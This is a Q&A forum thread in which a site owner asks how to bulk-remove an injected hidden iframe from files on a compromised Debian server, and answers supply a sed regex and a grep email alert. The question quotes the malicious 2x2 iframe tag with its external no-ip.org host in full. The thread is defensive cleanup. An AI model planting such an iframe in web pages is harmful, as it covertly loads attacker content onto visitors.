# Debian, Search and replace iframe injection

Tags: debian, regex, replace

We're running a Debian server and we have a malware or something doing code injection.

I know how to search and replace this string :

```
<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>
```

I do it this way :

```
find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'
```

My problem is the url `http://ingvar2000.no-ip.org/jc/rss.php` changes from files to files, so how can I search and replace :

```
<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>
```

Because the width, height, and frameborder is always the same.

Comment: Your site's compromised. Redeploy it from a pristine copy, and then fix the security problem that caused this in the first place.

Comment: Yes i sure will but i can't and i have to find someone to do it. Until then, this little fix will avoid the site being listed as malicious by google. At least I hope so...

Comment: This little fix will be undone quickly by whoever hacked your site in the first place.

Comment: I know, but again, i can't manage this by myself, i a front end actionscript 3 developper, not bad at all, but i don't know anything about sysadmin... So until i find someone i do what i can :( But still, thank you for carring, it's very nice of you, and be sure i ll do my best to reinstall everything as soon as possible :)

Answer (score 1, accepted):

Use

```
find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'
```

here `[^"]*` means 0 ore more characters of anything but `"`.

Comment: Awsome, thank you very much for your quick and very efficient response !

I might ask for too much, but do you know if it's possible to send an email if the requested string is found ? 

Thank's again, you saved my day !

Frederic.

Comment: You're welcome! Just run another script before this to walk through all files and e-mail you all the matched files. Like: `grep -R '<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>' /home | mail -s "Alert" your@address.com`

Comment: One more time, Thanks ! And since i'm french and we dont really mind abusing people helping ^^ Do you know if it's possible to send the email only if a file matched ? Thanks again a thousand times, it's very kind of you :)

Comment: You can redirect the `grep` to a file and then check if the file exists and only if it exists send the letter.